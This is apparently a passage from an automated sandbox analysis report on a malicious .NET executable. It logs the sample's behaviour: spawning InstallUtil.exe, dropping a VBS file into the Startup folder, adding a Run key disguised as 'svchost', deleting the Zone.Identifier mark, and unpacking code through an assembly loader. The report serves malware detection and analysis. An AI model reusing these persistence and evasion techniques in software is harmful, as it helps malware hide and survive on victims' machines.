                Source: 0.2.________.exe.c30000.0.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                Source: 0.2.________.exe.c30000.0.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                Source: 0.2.________.exe.c30000.0.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                Source: 0.2.________.exe.c30000.0.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                Source: 0.2.________.exe.c30000.0.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@3/3@2/2
                Source: C:\Users\user\Desktop\________.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeId.vbsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: \Sessions\1\BaseNamedObjects\Local\0b30f45d-3c54-4926-a32f-8a1dc077eb21
                Source: ________.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: ________.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\________.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: ________.exe, 00000000.00000002.2170154648.0000000003661000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2157230652.0000000002651000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT TOP 0 * FROM {0};
                Source: ________.exe, 00000000.00000002.2170154648.0000000003661000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2157230652.0000000002651000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Deleted' AS "$action", @(Model.PreOutput) FROM @(Model.DestinationTableName) WHERE @(Model.PrimaryKeyStagingJoin);UPDATE @(Model.DestinationTableName) SET @(Model.UpdateSetStagingNames) WHERE @(Model.PrimaryKeyStagingJoin);SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Inserted' AS "$action", @(Model.PostOutput) FROM @(Model.DestinationTableName) WHERE @(Model.PrimaryKeyStagingJoin);
                Source: ________.exe, 00000000.00000002.2157230652.0000000002651000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Deleted' AS "$action", @(Model.PreOutput) FROM @(Model.DestinationTableName) WHERE @(Model.PrimaryKeyStagingJoin);
                Source: ________.exe, 00000000.00000002.2157230652.0000000002651000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Inserted' AS "$action", @(Model.PostOutput) FROM @(Model.DestinationTableName) WHERE ROWID = last_insert_rowid();
                Source: ________.exe, 00000000.00000002.2196940181.00000000082A0000.00000004.00000020.00020000.00000000.sdmp, ________.exe, 00000000.00000000.2108679772.0000000000142000.00000002.00000001.01000000.00000003.sdmp, ________.exe, 00000000.00000002.2170154648.0000000003712000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe.0.drBinary or memory string: SELECT @countGroupBy AS [countGroupBy], @count AS [count]PDELETE FROM @(Model.TemporaryTableName);RDELETE FROM @@(Model.TemporaryTableName);
                Source: ________.exe, 00000000.00000002.2157230652.0000000002651000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Deleted' AS "$action", @(Model.PreOutput) FROM @(Model.DestinationTableName) WHERE @(Model.PrimaryKeyStagingJoin);DELETE FROM @(Model.DestinationTableName) WHERE @(Model.PrimaryKeyStagingJoin);
                Source: ________.exe, 00000000.00000002.2170154648.0000000003661000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2157230652.0000000002651000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE @(Model.TemporaryTableName) ( @(Model.TemporaryTableColumnCreate) CONSTRAINT PK_@(Model.TemporaryTableNamePK) PRIMARY KEY CLUSTERED ( ZZZ_Index ASC) );
                Source: ________.exe, 00000000.00000002.2170154648.0000000003661000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2157230652.0000000002651000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE @(Model.TemporaryTableName) ( @(Model.TemporaryTableColumnCreate) CONSTRAINT [PK_@(Model.TemporaryTableNamePK)] PRIMARY KEY CLUSTERED ( ZZZ_Index ASC) );
                Source: ________.exe, 00000000.00000002.2170154648.0000000003661000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT TOP 0 @(Model.TemporaryColumnNames) INTO @(Model.TemporaryTableName) FROM (SELECT 1 AS ZZZ_Index) AS A LEFT JOIN @(Model.DestinationTableName) AS B ON 1 = 2;'Z.EntityFramework.Extensions.LicenseKey
                Source: ________.exe, 00000000.00000002.2196940181.00000000082A0000.00000004.00000020.00020000.00000000.sdmp, ________.exe, 00000000.00000000.2108679772.0000000000142000.00000002.00000001.01000000.00000003.sdmp, ________.exe, 00000000.00000002.2170154648.0000000003712000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2157230652.0000000002651000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe.0.drBinary or memory string: SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Inserted' AS "$action", @(Model.PostOutput) FROM @(Model.DestinationTableName) WHERE (@(Model.PrimaryKeyStagingJoinMerge)) OR ROWID = last_insert_rowid();
                Source: ________.exe, 00000000.00000002.2157230652.0000000002651000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT TOP 0 @(Model.TemporaryColumnNames) INTO @(Model.TemporaryTableName) FROM (SELECT 1 AS ZZZ_Index) AS A LEFT JOIN @(Model.DestinationTableName) AS B ON 1 = 2;
                Source: ________.exe, 00000000.00000002.2170154648.0000000003661000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2157230652.0000000002651000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: UPDATE @(Model.DestinationTableName) SET @(Model.UpdateSetStagingNames) WHERE @(Model.PrimaryKeyStagingJoin);SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Inserted' AS "$action", @(Model.PostOutput) FROM @(Model.DestinationTableName) WHERE @(Model.PrimaryKeyStagingJoin);
                Source: ________.exe, 00000000.00000002.2196940181.00000000082A0000.00000004.00000020.00020000.00000000.sdmp, ________.exe, 00000000.00000000.2108679772.0000000000142000.00000002.00000001.01000000.00000003.sdmp, ________.exe, 00000000.00000002.2170154648.0000000003712000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2157230652.0000000002651000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe.0.drBinary or memory string: UPDATE @(Model.DestinationTableName) SET @(Model.UpdateSetStagingNames) WHERE @(Model.PrimaryKeyStagingJoin);
                Source: ________.exe, 00000000.00000002.2196940181.00000000082A0000.00000004.00000020.00020000.00000000.sdmp, ________.exe, 00000000.00000000.2108679772.0000000000142000.00000002.00000001.01000000.00000003.sdmp, ________.exe, 00000000.00000002.2170154648.0000000003712000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe.0.drBinary or memory string: INSERT INTO @(Model.DestinationTableName) ( @(Model.InsertColumnNames) ) VALUES ( @(Model.InsertStagingNames) );
                Source: ________.exe, 00000000.00000002.2196940181.00000000082A0000.00000004.00000020.00020000.00000000.sdmp, ________.exe, 00000000.00000000.2108679772.0000000000142000.00000002.00000001.01000000.00000003.sdmp, ________.exe, 00000000.00000002.2170154648.0000000003712000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe.0.drBinary or memory string: CREATE TABLE @(Model.TemporaryTableName) ( @(Model.TemporaryTableColumnCreate) );
                Source: ________.exe, 00000000.00000002.2157230652.0000000002651000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Inserted' AS "$action", @(Model.PostOutput) FROM @(Model.DestinationTableName) WHERE (@(Model.PrimaryKeyStagingJoin)) OR ROWID = last_insert_rowid();
                Source: ________.exe, 00000000.00000002.2170154648.0000000003661000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2157230652.0000000002651000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT * FROM {0} LIMIT 0;
                Source: ________.exeReversingLabs: Detection: 57%
                Source: C:\Users\user\Desktop\________.exeFile read: C:\Users\user\Desktop\________.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\________.exe "C:\Users\user\Desktop\________.exe"
                Source: C:\Users\user\Desktop\________.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                Source: C:\Users\user\Desktop\________.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                Source: C:\Users\user\Desktop\________.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\________.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\________.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\________.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\________.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\________.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\________.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\________.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\________.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\________.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\________.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\________.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\________.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\________.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\________.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\________.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\________.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\________.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\________.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\________.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\________.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\________.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\________.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\________.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\________.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\________.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\________.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\________.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\________.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\________.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\________.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\________.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\________.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\________.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\________.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\________.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\________.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\________.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\________.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\________.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: ________.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: ________.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                Source: ________.exeStatic file information: File size 1484800 > 1048576
                Source: ________.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x169e00
                Source: ________.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: ________.exe, 00000000.00000002.2157123227.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, ________.exe, 00000000.00000002.2170154648.0000000003712000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2157230652.0000000002A04000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2170154648.0000000003661000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: ________.exe, 00000000.00000002.2157123227.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, ________.exe, 00000000.00000002.2170154648.0000000003712000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2157230652.0000000002A04000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2170154648.0000000003661000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: protobuf-net.pdbSHA256}Lq source: ________.exe, 00000000.00000002.2170154648.0000000003FC7000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2185351937.00000000066A0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: protobuf-net.pdb source: ________.exe, 00000000.00000002.2170154648.0000000003FC7000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2185351937.00000000066A0000.00000004.08000000.00040000.00000000.sdmp

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: ________.exe, -.cs.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.________.exe.c30000.0.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                Source: 0.2.________.exe.c30000.0.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                Source: 0.2.________.exe.c30000.0.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                Source: 0.2.________.exe.4092840.5.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                Source: 0.2.________.exe.4092840.5.raw.unpack, ListDecorator.cs.Net Code: Read
                Source: 0.2.________.exe.4092840.5.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                Source: 0.2.________.exe.4092840.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                Source: 0.2.________.exe.4092840.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                Source: 0.2.________.exe.4042820.6.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                Source: 0.2.________.exe.4042820.6.raw.unpack, ListDecorator.cs.Net Code: Read
                Source: 0.2.________.exe.4042820.6.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                Source: 0.2.________.exe.4042820.6.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                Source: 0.2.________.exe.4042820.6.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                Yara detected Costura Assembly Loader
                Source: Yara matchFile source: 0.2.________.exe.68a0000.12.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2186106678.00000000068A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2157230652.0000000002651000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: ________.exe PID: 1812, type: MEMORYSTR
                Source: C:\Users\user\Desktop\________.exeCode function: 0_2_00C0C320 push cs; retf 0_2_00C0C323
                Source: C:\Users\user\Desktop\________.exeCode function: 0_2_070E31BA push ebx; iretd 0_2_070E31C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0293E178 push esp; iretd 2_2_0293E179
                Source: C:\Users\user\Desktop\________.exeFile created: C:\Users\user\AppData\Roaming\TypeId.exeJump to dropped file

                Boot Survival

                barindex
                Drops VBS files to the startup folder
                Source: C:\Users\user\Desktop\________.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeId.vbsJump to dropped file
                Source: C:\Users\user\Desktop\________.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeId.vbsJump to behavior
                Source: C:\Users\user\Desktop\________.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeId.vbsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchostJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchostJump to behavior

                Hooking and other Techniques for Hiding and Protection

                barindex
                Hides that the sample has been downloaded from the Internet (zone.identifier)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe:Zone.Identifier read attributes | deleteJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
